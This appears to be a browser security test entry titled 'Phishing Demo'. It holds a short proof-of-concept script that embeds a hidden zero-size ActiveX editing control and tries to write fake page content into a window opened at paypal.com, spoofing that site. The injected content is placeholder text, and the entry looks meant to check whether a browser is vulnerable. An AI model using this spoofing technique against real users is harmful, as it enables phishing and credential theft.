| Test Name: | Phishing Demo |
| Security Status: | |
| Solution | Here is the description |
| Code: |
<object id="dec" classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A"
width="0" height="0"> <param name="ActivateApplets" value="1"> <param name="ActivateActiveXControls" value="1"> </object> function trigger(){ url = "http://www.paypal.com/"; target = "this_should_be_a_unique_name"; window.name = target; open(url, target);} function payload(){ url = "http://www.paypal.com/"; s = '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">' + '<HTML>This is a Fake Paypal site!</HTML>'; w = open(url, "paypal"); w.document.write(s);}
var dm=dec.DOM.Script; |